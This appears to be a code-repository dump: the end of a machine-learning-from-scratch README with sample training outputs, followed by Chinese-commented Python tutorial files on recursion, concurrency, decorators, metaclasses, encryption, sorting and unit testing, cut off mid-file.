</p> ### Generating Handwritten Digits $ python mlfromscratch/unsupervised_learning/generative_adversarial_network.py +-----------+ | Generator | +-----------+ Input Shape: (100,) +------------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +------------------------+------------+--------------+ | Dense | 25856 | (256,) | | Activation (LeakyReLU) | 0 | (256,) | | BatchNormalization | 512 | (256,) | | Dense | 131584 | (512,) | | Activation (LeakyReLU) | 0 | (512,) | | BatchNormalization | 1024 | (512,) | | Dense | 525312 | (1024,) | | Activation (LeakyReLU) | 0 | (1024,) | | BatchNormalization | 2048 | (1024,) | | Dense | 803600 | (784,) | | Activation (TanH) | 0 | (784,) | +------------------------+------------+--------------+ Total Parameters: 1489936 +---------------+ | Discriminator | +---------------+ Input Shape: (784,) +------------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +------------------------+------------+--------------+ | Dense | 401920 | (512,) | | Activation (LeakyReLU) | 0 | (512,) | | Dropout | 0 | (512,) | | Dense | 131328 | (256,) | | Activation (LeakyReLU) | 0 | (256,) | | Dropout | 0 | (256,) | | Dense | 514 | (2,) | | Activation (Softmax) | 0 | (2,) | +------------------------+------------+--------------+ Total Parameters: 533762 <p align="center"> <img src="http://eriklindernoren.se/images/gan_mnist5.gif" width="640"> </p> <p align="center"> Figure: Training progress of a Generative Adversarial Network generating <br> handwritten digits. </p> ### Deep Reinforcement Learning $ python mlfromscratch/examples/deep_q_network.py +----------------+ | Deep Q-Network | +----------------+ Input Shape: (4,) +-------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +-------------------+------------+--------------+ | Dense | 320 | (64,) | | Activation (ReLU) | 0 | (64,) | | Dense | 130 | (2,) | +-------------------+------------+--------------+ Total Parameters: 450 <p align="center"> <img src="http://eriklindernoren.se/images/mlfs_dql1.gif" width="640"> </p> <p align="center"> Figure: Deep Q-Network solution to the CartPole-v1 environment in OpenAI gym. </p> ### Image Reconstruction With RBM $ python mlfromscratch/examples/restricted_boltzmann_machine.py <p align="center"> <img src="http://eriklindernoren.se/images/rbm_digits1.gif" width="640"> </p> <p align="center"> Figure: Shows how the network gets better during training at reconstructing <br> the digit 2 in the MNIST dataset. </p> ### Evolutionary Evolved Neural Network $ python mlfromscratch/examples/neuroevolution.py +---------------+ | Model Summary | +---------------+ Input Shape: (64,) +----------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +----------------------+------------+--------------+ | Dense | 1040 | (16,) | | Activation (ReLU) | 0 | (16,) | | Dense | 170 | (10,) | | Activation (Softmax) | 0 | (10,) | +----------------------+------------+--------------+ Total Parameters: 1210 Population Size: 100 Generations: 3000 Mutation Rate: 0.01 [0 Best Individual - Fitness: 3.08301, Accuracy: 10.5%] [1 Best Individual - Fitness: 3.08746, Accuracy: 12.0%] ... [2999 Best Individual - Fitness: 94.08513, Accuracy: 98.5%] Test set accuracy: 96.7% <p align="center"> <img src="http://eriklindernoren.se/images/evo_nn4.png" width="640"> </p> <p align="center"> Figure: Classification of the digit dataset by a neural network which has<br> been evolutionary evolved. 
</p> ### Genetic Algorithm $ python mlfromscratch/examples/genetic_algorithm.py +--------+ | GA | +--------+ Description: Implementation of a Genetic Algorithm which aims to produce the user specified target string. This implementation calculates each candidate's fitness based on the alphabetical distance between the candidate and the target. A candidate is selected as a parent with probabilities proportional to the candidate's fitness. Reproduction is implemented as a single-point crossover between pairs of parents. Mutation is done by randomly assigning new characters with uniform probability. Parameters ---------- Target String: 'Genetic Algorithm' Population Size: 100 Mutation Rate: 0.05 [0 Closest Candidate: 'CJqlJguPlqzvpoJmb', Fitness: 0.00] [1 Closest Candidate: 'MCxZxdr nlfiwwGEk', Fitness: 0.01] [2 Closest Candidate: 'MCxZxdm nlfiwwGcx', Fitness: 0.01] [3 Closest Candidate: 'SmdsAklMHn kBIwKn', Fitness: 0.01] [4 Closest Candidate: ' lotneaJOasWfu Z', Fitness: 0.01] ... [292 Closest Candidate: 'GeneticaAlgorithm', Fitness: 1.00] [293 Closest Candidate: 'GeneticaAlgorithm', Fitness: 1.00] [294 Answer: 'Genetic Algorithm'] ### Association Analysis $ python mlfromscratch/examples/apriori.py +-------------+ | Apriori | +-------------+ Minimum Support: 0.25 Minimum Confidence: 0.8 Transactions: [1, 2, 3, 4] [1, 2, 4] [1, 2] [2, 3, 4] [2, 3] [3, 4] [2, 4] Frequent Itemsets: [1, 2, 3, 4, [1, 2], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 4], [2, 3, 4]] Rules: 1 -> 2 (support: 0.43, confidence: 1.0) 4 -> 2 (support: 0.57, confidence: 0.8) [1, 4] -> 2 (support: 0.29, confidence: 1.0) ## Implementations ### Supervised Learning - [Adaboost](mlfromscratch/supervised_learning/adaboost.py) - [Bayesian Regression](mlfromscratch/supervised_learning/bayesian_regression.py) - [Decision Tree](mlfromscratch/supervised_learning/decision_tree.py) - [Elastic Net](mlfromscratch/supervised_learning/regression.py) - [Gradient Boosting](mlfromscratch/supervised_learning/gradient_boosting.py) - [K Nearest Neighbors](mlfromscratch/supervised_learning/k_nearest_neighbors.py) - [Lasso Regression](mlfromscratch/supervised_learning/regression.py) - [Linear Discriminant Analysis](mlfromscratch/supervised_learning/linear_discriminant_analysis.py) - [Linear Regression](mlfromscratch/supervised_learning/regression.py) - [Logistic Regression](mlfromscratch/supervised_learning/logistic_regression.py) - [Multi-class Linear Discriminant Analysis](mlfromscratch/supervised_learning/multi_class_lda.py) - [Multilayer Perceptron](mlfromscratch/supervised_learning/multilayer_perceptron.py) - [Naive Bayes](mlfromscratch/supervised_learning/naive_bayes.py) - [Neuroevolution](mlfromscratch/supervised_learning/neuroevolution.py) - [Particle Swarm Optimization of Neural Network](mlfromscratch/supervised_learning/particle_swarm_optimization.py) - [Perceptron](mlfromscratch/supervised_learning/perceptron.py) - [Polynomial Regression](mlfromscratch/supervised_learning/regression.py) - [Random Forest](mlfromscratch/supervised_learning/random_forest.py) - [Ridge Regression](mlfromscratch/supervised_learning/regression.py) - [Support Vector Machine](mlfromscratch/supervised_learning/support_vector_machine.py) - [XGBoost](mlfromscratch/supervised_learning/xgboost.py) ### Unsupervised Learning - [Apriori](mlfromscratch/unsupervised_learning/apriori.py) - [Autoencoder](mlfromscratch/unsupervised_learning/autoencoder.py) - [DBSCAN](mlfromscratch/unsupervised_learning/dbscan.py) - [FP-Growth](mlfromscratch/unsupervised_learning/fp_growth.py) - 
[Gaussian Mixture Model](mlfromscratch/unsupervised_learning/gaussian_mixture_model.py) - [Generative Adversarial Network](mlfromscratch/unsupervised_learning/generative_adversarial_network.py) - [Genetic Algorithm](mlfromscratch/unsupervised_learning/genetic_algorithm.py) - [K-Means](mlfromscratch/unsupervised_learning/k_means.py) - [Partitioning Around Medoids](mlfromscratch/unsupervised_learning/partitioning_around_medoids.py) - [Principal Component Analysis](mlfromscratch/unsupervised_learning/principal_component_analysis.py) - [Restricted Boltzmann Machine](mlfromscratch/unsupervised_learning/restricted_boltzmann_machine.py) ### Reinforcement Learning - [Deep Q-Network](mlfromscratch/reinforcement_learning/deep_q_network.py) ### Deep Learning + [Neural Network](mlfromscratch/deep_learning/neural_network.py) + [Layers](mlfromscratch/deep_learning/layers.py) * Activation Layer * Average Pooling Layer * Batch Normalization Layer * Constant Padding Layer * Convolutional Layer * Dropout Layer * Flatten Layer * Fully-Connected (Dense) Layer * Fully-Connected RNN Layer * Max Pooling Layer * Reshape Layer * Up Sampling Layer * Zero Padding Layer + Model Types * [Convolutional Neural Network](mlfromscratch/examples/convolutional_neural_network.py) * [Multilayer Perceptron](mlfromscratch/examples/multilayer_perceptron.py) * [Recurrent Neural Network](mlfromscratch/examples/recurrent_neural_network.py) ## Contact If there's some implementation you would like to see here or if you're just feeling social, feel free to [email](mailto:[email protected]) me or connect with me on [LinkedIn](https://www.linkedin.com/in/eriklindernoren/).
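A footnote on the Genetic Algorithm example above: the scheme it describes (alphabetical-distance fitness, fitness-proportional parent selection, single-point crossover, uniform random mutation) fits in a few dozen lines of plain Python. The sketch below is a standalone illustration under those assumptions and is not the repository's implementation (that lives in `mlfromscratch/unsupervised_learning/genetic_algorithm.py`); the names and parameter values are illustrative.

```py
import random
import string

TARGET = 'Genetic Algorithm'
LETTERS = string.ascii_letters + ' '
POPULATION_SIZE = 100
MUTATION_RATE = 0.05


def fitness(candidate):
    # Fitness shrinks with the summed alphabetical distance to the target;
    # an exact match scores 1.0, mirroring the output shown above.
    distance = sum(abs(ord(a) - ord(b)) for a, b in zip(candidate, TARGET))
    return 1 / (distance + 1)


def crossover(parent1, parent2):
    # Single-point crossover between a pair of parents.
    point = random.randint(0, len(TARGET))
    return parent1[:point] + parent2[point:]


def mutate(candidate):
    # Replace each character with a uniformly random one with probability MUTATION_RATE.
    return ''.join(random.choice(LETTERS) if random.random() < MUTATION_RATE else ch
                   for ch in candidate)


population = [''.join(random.choice(LETTERS) for _ in TARGET)
              for _ in range(POPULATION_SIZE)]

for generation in range(2000):
    scores = [fitness(c) for c in population]
    best = max(population, key=fitness)
    print('[%d Closest Candidate: %r, Fitness: %.2f]' % (generation, best, fitness(best)))
    if best == TARGET:
        break
    # Parents are drawn with probability proportional to fitness.
    parents = random.choices(population, weights=scores, k=2 * POPULATION_SIZE)
    population = [mutate(crossover(parents[2 * i], parents[2 * i + 1]))
                  for i in range(POPULATION_SIZE)]
```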
Python-100-Days
bf24146944745bb25c66c82307fd218abd179c6a
File: Day31-35/code/josephu.py def main(): persons = [True] * 30 counter = 0 index = 0 number = 0 while counter < 15: if persons[index]: number += 1 if number == 9: persons[index] = False number = 0 counter += 1 index += 1 index %= len(persons) for person in persons: print('基' if person else '非', end='') print() if __name__ == '__main__': main() File: Day31-35/code/dayofyear.py import sys import mycal def main(): if len(sys.argv) != 4: print('Not enough arguments') return year = int(sys.argv[1]) month = int(sys.argv[2]) day = int(sys.argv[3]) total = 0 for m in range(1, month): total += mycal.get_days(year, m) total += day print(f'{year}年{month}月{day}日是{year}年的第{total}天') if __name__ == '__main__': main() File: Day31-35/code/guess.py #!/usr/bin/python3 # coding: utf-8 from random import randint def main(): answer = randint(1, 100) while True: number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break if __name__ == '__main__': main() File: Day31-35/code/mycal.py #!/usr/bin/python3 from datetime import datetime import sys def is_leap(year): return year % 4 == 0 and year % 100 != 0 or year % 400 == 0 def main(): if len(sys.argv) == 3: month = int(sys.argv[1]) year = int(sys.argv[2]) else: now = datetime.now() date = now.date month = now.month year = now.year m, y = (month, year) if month >= 3 else (month + 12, year - 1) c, y = y // 100, y % 100 w = (y + y // 4 + c // 4 - 2 * c + 26 * (m + 1) // 10) % 7 month_words = [ 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December' ] print(f'{month_words[month - 1]} {year}'.center(20)) print('Su Mo Tu We Th Fr Sa') print(' ' * 3 * w, end='') days = [ [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31], [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] ][is_leap(year)][month - 1] for day in range(1, days + 1): print(str(day).rjust(2), end=' ') w += 1 if w == 7: print() w = 0 print() if __name__ == '__main__': main() File: Day31-35/code/homework01.py # 经典递归求解问题: # 1. 迷宫寻路 # 2. 汉诺塔(梵塔) # 3. 骑士周游 # 4. 八皇后 def f(n: int, m=1) -> int: if n == 0 or n == 1: return m return f(n - 1, n * m) def sum(n: int) -> int: if n == 1: return 1 return n + sum(n - 1) def steps(n: int, m={}) -> int: if n < 0: return 0 elif n == 0: return 1 else: try: return m[n] except: m[n] = steps(n - 1) + steps(n - 2) + steps(n - 3) return m[n] def list_depth(items: list) -> int: max_depth = 1 if isinstance(items, list) else 0 if max_depth: for item in items: if isinstance(item, list): max_depth = max(max_depth, list_depth(item) + 1) return max_depth def main(): mylist = [1, ['a', ['b', ['c']]],[100, [200, 300, [400, [500, [600, [700]]]]]]] thylist = [[], [[[]]], [[], []]] print(list_depth(mylist)) print(list_depth(thylist)) if __name__ == '__main__': main() File: Day16-20/code/example19.py """ 扩展性系统性能 - 垂直扩展 - 增加单节点处理能力 - 水平扩展 - 将单节点变成多节点(读写分离/分布式集群) 并发编程 - 加速程序执行 / 改善用户体验 耗时间的任务都尽可能独立的执行,不要阻塞代码的其他部分 - 多线程 1. 创建Thread对象指定target和args属性并通过start方法启动线程 2. 继承Thread类并重写run方法来定义线程执行的任务 3. 
创建线程池对象ThreadPoolExecutor并通过submit来提交要执行的任务 第3种方式可以通过Future对象的result方法在将来获得线程的执行结果 也可以通过done方法判定线程是否执行结束 - 多进程 - 异步I/O """ import glob import os import time from concurrent.futures import ThreadPoolExecutor from threading import Thread from PIL import Image # class ThumbnailThread(Thread): # def __init__(self, infile): # self.infile = infile # super().__init__() # def run(self): # file, ext = os.path.splitext(self.infile) # filename = file[file.rfind('/') + 1:] # for size in (32, 64, 128): # outfile = f'thumbnails/{filename}_{size}_{size}.png' # image = Image.open(self.infile) # image.thumbnail((size, size)) # image.save(outfile, format='PNG') def gen_thumbnail(infile): file, ext = os.path.splitext(infile) filename = file[file.rfind('/') + 1:] for size in (32, 64, 128): outfile = f'thumbnails/{filename}_{size}_{size}.png' image = Image.open(infile) image.thumbnail((size, size)) image.save(outfile, format='PNG') # def main(): # start = time.time() # threads = [] # for infile in glob.glob('images/*'): # # t = Thread(target=gen_thumbnail, args=(infile, )) # t = ThumbnailThread(infile) # t.start() # threads.append(t) # for t in threads: # t.join() # end = time.time() # print(f'耗时: {end - start}秒') def main(): pool = ThreadPoolExecutor(max_workers=30) futures = [] start = time.time() for infile in glob.glob('images/*'): # submit方法是非阻塞式的方法 # 即便工作线程数已经用完,submit方法也会接受提交的任务 future = pool.submit(gen_thumbnail, infile) futures.append(future) for future in futures: # result方法是一个阻塞式的方法 如果线程还没有结束 # 暂时取不到线程的执行结果 代码就会在此处阻塞 future.result() end = time.time() print(f'耗时: {end - start}秒') # shutdown也是非阻塞式的方法 但是如果已经提交的任务还没有执行完 # 线程池是不会停止工作的 shutdown之后再提交任务就不会执行而且会产生异常 pool.shutdown() if __name__ == '__main__': main() File: Day16-20/code/example09.py """ 装饰器 - 装饰器中放置的通常都是横切关注(cross-concern)功能 所谓横切关注功能就是很多地方都会用到但跟正常业务又逻辑没有必然联系的功能 装饰器实际上是实现了设计模式中的代理模式 - AOP(面向切面编程) """ from functools import wraps from random import randint from time import time, sleep import pymysql def record(output): def decorate(func): @wraps(func) def wrapper(*args, **kwargs): start = time() ret_value = func(*args, **kwargs) output(func.__name__, time() - start) return ret_value return wrapper return decorate def output_to_console(fname, duration): print('%s: %.3f秒' % (fname, duration)) def output_to_file(fname, duration): with open('log.txt', 'a') as file_stream: file_stream.write('%s: %.3f秒\n' % (fname, duration)) def output_to_db(fname, duration): con = pymysql.connect(host='localhost', port=3306, database='test', charset='utf8', user='root', password='123456', autocommit=True) try: with con.cursor() as cursor: cursor.execute('insert into tb_record values (default, %s, %s)', (fname, '%.3f' % duration)) finally: con.close() @record(output_to_console) def random_delay(min, max): sleep(randint(min, max)) def main(): for _ in range(3): # print(random_delay.__name__) random_delay(3, 5) # for _ in range(3): # # 取消掉装饰器 # random_delay.__wrapped__(3, 5) if __name__ == '__main__': main() File: Day16-20/code/example18.py """ 元 - meta 元数据 - 描述数据的数据 - metadata 元类 - 描述类的类 - metaclass - 继承自type """ import threading class SingletonMeta(type): """自定义元类""" def __init__(cls, *args, **kwargs): cls.__instance = None cls.lock = threading.Lock() super().__init__(*args, **kwargs) def __call__(cls, *args, **kwargs): if cls.__instance is None: with cls.lock: if cls.__instance is None: cls.__instance = super().__call__(*args, **kwargs) return cls.__instance class President(metaclass=SingletonMeta): """总统(单例类)""" def __init__(self, name, country): self.name = name 
self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): """主函数""" p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') p3 = President.__call__('克林顿', '美国') print(p1 == p2) print(p1 == p3) print(p1, p2, p3, sep='\n') if __name__ == '__main__': main() File: Day16-20/code/example08.py """ 加密和解密 对称加密 - 加密和解密是同一个密钥 - DES / AES 非对称加密 - 加密和解密是不同的密钥 - RSA pip install pycrypto """ import base64 from hashlib import md5 from Crypto.Cipher import AES from Crypto import Random from Crypto.PublicKey import RSA # # AES加密的密钥(长度32个字节) # key = md5(b'1qaz2wsx').hexdigest() # # AES加密的初始向量(随机生成) # iv = Random.new().read(AES.block_size) def main(): """主函数""" # 生成密钥对 key_pair = RSA.generate(1024) # 导入公钥 pub_key = RSA.importKey(key_pair.publickey().exportKey()) # 导入私钥 pri_key = RSA.importKey(key_pair.exportKey()) message1 = 'hello, world!' # 加密数据 data = pub_key.encrypt(message1.encode(), None) # 对加密数据进行BASE64编码 message2 = base64.b64encode(data[0]) print(message2) # 对加密数据进行BASE64解码 data = base64.b64decode(message2) # 解密数据 message3 = pri_key.decrypt(data) print(message3.decode()) # # AES - 对称加密 # str1 = '我爱你们!' # cipher = AES.new(key, AES.MODE_CFB, iv) # # 加密 # str2 = cipher.encrypt(str1) # print(str2) # # 解密 # cipher = AES.new(key, AES.MODE_CFB, iv) # str3 = cipher.decrypt(str2) # print(str3.decode()) if __name__ == '__main__': main() File: Day16-20/code/test_example01.py """ 单元测试 - 针对程序中最小的功能模块(函数和方法)的测试 测试方法: - 白盒测试:程序自己写的测试 - 黑盒测试:测试人员或QA,不知道代码实现细节,只关注功能 编写Python单元测试 - 定义类继承TestCase,写测试方法(test_开头) 执行单元测试: - unittest.main() - python3 -m unittest test_example01.py 第三方库 - nose2 / pytest pip install pytest pytest-cov pytest -v --cov ------------------------------ pip install nose2 cov-core nose2 -v -C """ from unittest import TestCase from example01 import seq_search, bin_search class TestExample01(TestCase): """测试查找函数的测试用例""" # 执行每个测试函数之前要执行的方法 def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.data2 = [12, 35, 40, 55, 68, 73, 81, 97] # 执行每个测试函数之后要执行的方法 def tearDown(self): pass def test_seq_search(self): """测试顺序查找""" self.assertEqual(0, seq_search(self.data1, 35)) self.assertEqual(2, seq_search(self.data1, 12)) self.assertEqual(6, seq_search(self.data1, 81)) self.assertEqual(7, seq_search(self.data1, 40)) self.assertEqual(-1, seq_search(self.data1, 99)) self.assertEqual(-1, seq_search(self.data1, 7)) def test_bin_search(self): """测试二分查找""" self.assertEqual(1, bin_search(self.data2, 35)) self.assertEqual(0, bin_search(self.data2, 12)) self.assertEqual(6, bin_search(self.data2, 81)) self.assertEqual(2, bin_search(self.data2, 40)) self.assertEqual(7, bin_search(self.data2, 97)) self.assertEqual(-1, bin_search(self.data2, 7)) self.assertEqual(-1, bin_search(self.data2, 99)) File: Day16-20/code/example23.py """ 协程(coroutine)- 可以在需要时进行切换的相互协作的子程序 """ import asyncio from example15 import is_prime def num_generator(m, n): """指定范围的数字生成器""" yield from range(m, n + 1) async def prime_filter(m, n): """素数过滤器""" primes = [] for i in num_generator(m, n): if is_prime(i): print('Prime =>', i) primes.append(i) await asyncio.sleep(0.001) return tuple(primes) async def square_mapper(m, n): """平方映射器""" squares = [] for i in num_generator(m, n): print('Square =>', i * i) squares.append(i * i) await asyncio.sleep(0.001) return squares def main(): """主函数""" loop = asyncio.get_event_loop() future = asyncio.gather(prime_filter(2, 100), square_mapper(1, 100)) future.add_done_callback(lambda x: print(x.result())) loop.run_until_complete(future) loop.close() if __name__ == '__main__': 
main() File: Day16-20/code/example17.py """ 多重继承 - 一个类有两个或者两个以上的父类 MRO - 方法解析顺序 - Method Resolution Order 当出现菱形继承(钻石继承)的时候,子类到底继承哪个父类的方法 Python 2.x - 深度优先搜索 Python 3.x - C3算法 - 类似于广度优先搜索 """ class A(): def say_hello(self): print('Hello, A') class B(A): pass class C(A): def say_hello(self): print('Hello, C') class D(B, C): pass class SetOnceMappingMixin(): """自定义混入类""" __slots__ = () def __setitem__(self, key, value): if key in self: raise KeyError(str(key) + ' already set') return super().__setitem__(key, value) class SetOnceDict(SetOnceMappingMixin, dict): """自定义字典""" pass def main(): print(D.mro()) # print(D.__mro__) D().say_hello() print(SetOnceDict.__mro__) my_dict= SetOnceDict() my_dict['username'] = 'jackfrued' my_dict['username'] = 'hellokitty' if __name__ == '__main__': main() File: Day16-20/code/example07.py """ 哈希摘要 - 数字签名/指纹 - 单向哈希函数(没有反函数不可逆) 应用领域: 1. 数据库中的用户敏感信息保存成哈希摘要 2. 给数据生成签名验证数据没有被恶意篡改 3. 云存储服务的秒传功能(去重功能) """ class StreamHasher(): """摘要生成器""" def __init__(self, algorithm='md5', size=4096): """初始化方法 @params: algorithm - 哈希摘要算法 size - 每次读取数据的大小 """ self.size = size cls = getattr(__import__('hashlib'), algorithm.lower()) self.hasher = cls() def digest(self, file_stream): """生成十六进制的摘要字符串""" # data = file_stream.read(self.size) # while data: # self.hasher.update(data) # data = file_stream.read(self.size) for data in iter(lambda: file_stream.read(self.size), b''): self.hasher.update(data) return self.hasher.hexdigest() def __call__(self, file_stream): return self.digest(file_stream) def main(): """主函数""" hasher1 = StreamHasher() hasher2 = StreamHasher('sha1') hasher3 = StreamHasher('sha256') with open('Python-3.7.2.tar.xz', 'rb') as file_stream: print(hasher1.digest(file_stream)) file_stream.seek(0, 0) print(hasher2.digest(file_stream)) file_stream.seek(0, 0) print(hasher3(file_stream)) if __name__ == '__main__': main() File: Day16-20/code/example13.py from example12 import EmployeeFactory def main(): """主函数""" emps = [ EmployeeFactory.create('M', '曹操'), EmployeeFactory.create('P', '荀彧', 120), EmployeeFactory.create('P', '郭嘉', 85), EmployeeFactory.create('S', '典韦', 123000), ] for emp in emps: print('%s: %.2f元' % (emp.name, emp.get_salary())) if __name__ == '__main__': main() File: Day16-20/code/example03.py """ 函数递归调用 - 函数直接或者间接的调用了自身 1. 收敛条件 2. 递归公式 n! = n * (n-1)! f(n) = f(n-1) + f(n-2) 1 1 2 3 5 8 13 21 34 55 ... 
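In the functions below, the base cases are num in (0, 1) for fac() and num in (1, 2) for fib(); fib() additionally caches intermediate results in a dict so that each value is computed only once.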
""" from contextlib import contextmanager from time import perf_counter def fac(num): """求阶乘""" assert num >= 0 if num in (0, 1): return 1 return num * fac(num - 1) def fib2(num): """普通函数""" a, b = 1, 1 for _ in range(num - 1): a, b = b, a + b return a def fib3(num): """生成器""" a, b = 0, 1 for _ in range(num): a, b = b, a + b yield a # 动态规划 - 保存可能进行重复运算的中间结果(空间换时间) def fib(num, results={}): """斐波拉切数""" assert num > 0 if num in (1, 2): return 1 try: return results[num] except KeyError: results[num] = fib(num - 1) + fib(num - 2) return results[num] @contextmanager def timer(): try: start = perf_counter() yield finally: end = perf_counter() print(f'{end - start}秒') def main(): """主函数""" # for val in fib3(20): # print(val) # gen = fib3(20) # for _ in range(10): # print(next(gen)) for num in range(1, 121): with timer(): print(f'{num}: {fib(num)}') # print(fac(5)) # print(fac(-5)) if __name__ == '__main__': main() File: Day16-20/code/example12.py """ 面向对象的三大支柱:封装、继承、多态 面向对象的设计原则:SOLID原则 面向对象的设计模式:GoF设计模式(单例、工厂、代理、策略、迭代器) 月薪结算系统 - 部门经理每月15000 程序员每小时200 销售员1800底薪加销售额5%提成 """ from abc import ABCMeta, abstractmethod class Employee(metaclass=ABCMeta): """员工(抽象类)""" def __init__(self, name): self.name = name @abstractmethod def get_salary(self): """结算月薪(抽象方法)""" pass class Manager(Employee): """部门经理""" def get_salary(self): return 15000.0 class Programmer(Employee): """程序员""" def __init__(self, name, working_hour=0): self.working_hour = working_hour super().__init__(name) def get_salary(self): return 200.0 * self.working_hour class Salesman(Employee): """销售员""" def __init__(self, name, sales=0.0): self.sales = sales super().__init__(name) def get_salary(self): return 1800.0 + self.sales * 0.05 class EmployeeFactory(): """创建员工的工厂(工厂模式 - 通过工厂实现对象使用者和对象之间的解耦合)""" @staticmethod def create(emp_type, *args, **kwargs): """创建员工""" emp_type = emp_type.upper() emp = None if emp_type == 'M': emp = Manager(*args, **kwargs) elif emp_type == 'P': emp = Programmer(*args, **kwargs) elif emp_type == 'S': emp = Salesman(*args, **kwargs) return emp File: Day16-20/code/example02.py """ 排序 - 冒泡排序、选择排序、归并排序、快速排序 冒泡排序 - O(n ** 2):两两比较,大的下沉 35, 97, 12, 68, 55, 73, 81, 40 35, 12, 68, 55, 73, 81, 40, [97] 12, 35, 55, 68, 73, 40, [81] 12, 35, 55, 68, 40, [73] ... 
选择排序 - O(n ** 2):每次从剩下元素中选择最小 ----------------------------------------- 归并排序 - O(n * log_2 n) - 高级排序算法 35, 97, 12, 68, 55, 73, 81, 40 [35, 97, 12, 68], [55, 73, 81, 40] [35, 97], [12, 68], [55, 73], [81, 40] [35], [97], [12], [68], [55], [73], [81], [40] [35, 97], [12, 68], [55, 73], [40, 81] [12, 35, 68, 97], [40, 55, 73, 81] [12, 35, 40, 55, 68, 73, 81, 97] ----------------------------------------- 快速排序 - 以枢轴为界将列表中的元素划分为两个部分,左边都比枢轴小,右边都比枢轴大 35, 97, 12, 68, 55, 73, 81, 40 35, 12, [40], 68, 55, 73, 81, 97 [12], 35, [40], 68, 55, 73, 81, [97] [12], 35, [40], 55, [68], 73, 81, [97] [12], 35, [40], 55, [68], 73, [81], [97] """ class Person(object): """人""" def __init__(self, name, age): self.name = name self.age = age # def __gt__(self, other): # return self.name > other.name def __str__(self): return f'{self.name}: {self.age}' def __repr__(self): return self.__str__() def select_sort(origin_items, comp=lambda x, y: x < y): """简单选择排序""" items = origin_items[:] for i in range(len(items) - 1): min_index = i for j in range(i + 1, len(items)): if comp(items[j], items[min_index]): min_index = j items[i], items[min_index] = items[min_index], items[i] return items # 函数的设计要尽量做到无副作用(不影响调用者) # 9 1 2 3 4 5 6 7 8 # 9 2 3 4 5 6 7 8 1 # *前面的参数叫位置参数,传参时只需要对号入座即可 # *后面的参数叫命名关键字参数,传参时必须给出参数名和参数值 # *args - 可变参数 - 元组 # **kwargs - 关键字参数 - 字典 def bubble_sort(origin_items, *, comp=lambda x, y: x > y): """冒泡排序""" items = origin_items[:] for i in range(1, len(items)): swapped = False for j in range(i - 1, len(items) - i): if comp(items[j], items[j + 1]): items[j], items[j + 1] = items[j + 1], items[j] swapped = True if swapped: swapped = False for j in range(len(items) - i - 1, i - 1, -1): if comp(items[j - 1], items[j]): items[j], items[j - 1] = items[j - 1], items[j] swapped = True if not swapped: break return items def merge_sort(items, comp=lambda x, y: x <= y): """归并排序""" if len(items) < 2: return items[:] mid = len(items) // 2 left = merge_sort(items[:mid], comp) right = merge_sort(items[mid:], comp) return merge(left, right, comp) def merge(items1, items2, comp=lambda x, y: x <= y): """合并(将两个有序列表合并成一个新的有序列表)""" items = [] index1, index2 = 0, 0 while index1 < len(items1) and index2 < len(items2): if comp(items1[index1], items2[index2]): items.append(items1[index1]) index1 += 1 else: items.append(items2[index2]) index2 += 1 items += items1[index1:] items += items2[index2:] return items def quick_sort(origin_items, comp=lambda x, y: x <= y): """快速排序""" items = origin_items[:] _quick_sort(items, 0, len(items) - 1, comp) return items def _quick_sort(items, start, end, comp): """递归调用划分和排序""" if start < end: pos = _partition(items, start, end, comp) _quick_sort(items, start, pos - 1, comp) _quick_sort(items, pos + 1, end, comp) def _partition(items, start, end, comp): """划分""" pivot = items[end] i = start - 1 for j in range(start, end): if comp(items[j], pivot): i += 1 items[i], items[j] = items[j], items[i] items[i + 1], items[end] = items[end], items[i + 1] return i + 1 def main(): """主函数""" items = [35, 97, 12, 68, 55, 73, 81, 40] # print(bubble_sort(items)) # print(select_sort(items)) # print(merge_sort(items)) print(quick_sort(items)) items2 = [ Person('Wang', 25), Person('Luo', 39), Person('Zhang', 50), Person('He', 20) ] # print(bubble_sort(items2, comp=lambda p1, p2: p1.age > p2.age)) # print(select_sort(items2, comp=lambda p1, p2: p1.name < p2.name)) # print(merge_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) print(quick_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) items3 = ['apple', 'orange', 
'watermelon', 'durian', 'pear'] # print(bubble_sort(items3)) # print(bubble_sort(items3, comp=lambda x, y: len(x) > len(y))) # print(merge_sort(items3)) print(merge_sort(items3)) if __name__ == '__main__': main() File: Day16-20/code/example22.py """ 多进程和进程池的使用 多线程因为GIL的存在不能够发挥CPU的多核特性 对于计算密集型任务应该考虑使用多进程 time python3 example22.py real 0m11.512s user 0m39.319s sys 0m0.169s """ import concurrent.futures import math PRIMES = [ 1116281, 1297337, 104395303, 472882027, 533000389, 817504243, 982451653, 112272535095293, 112582705942171, 112272535095293, 115280095190773, 115797848077099, 1099726899285419 ] * 5 def is_prime(n): """判断素数""" if n % 2 == 0: return False sqrt_n = int(math.floor(math.sqrt(n))) for i in range(3, sqrt_n + 1, 2): if n % i == 0: return False return True def main(): """主函数""" with concurrent.futures.ProcessPoolExecutor() as executor: for number, prime in zip(PRIMES, executor.map(is_prime, PRIMES)): print('%d is prime: %s' % (number, prime)) if __name__ == '__main__': main() File: Day16-20/code/example16.py """ 魔术方法 如果要把自定义对象放到set或者用作dict的键 那么必须要重写__hash__和__eq__两个魔术方法 前者用来计算对象的哈希码,后者用来判断两个对象是否相同 哈希码不同的对象一定是不同的对象,但哈希码相同未必是相同的对象(哈希码冲撞) 所以在哈希码相同的时候还要通过__eq__来判定对象是否相同 """ class Student(): __slots__ = ('stuid', 'name', 'gender') def __init__(self, stuid, name): self.stuid = stuid self.name = name def __hash__(self): return hash(self.stuid) + hash(self.name) def __eq__(self, other): return self.stuid == other.stuid and \ self.name == other.name def __str__(self): return f'{self.stuid}: {self.name}' def __repr__(self): return self.__str__() class School(): def __init__(self, name): self.name = name self.students = {} def __setitem__(self, key, student): self.students[key] = student def __getitem__(self, key): return 